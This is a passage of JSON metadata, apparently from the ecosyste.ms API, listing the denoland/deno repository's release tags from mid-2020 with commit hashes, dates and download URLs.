cy_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0"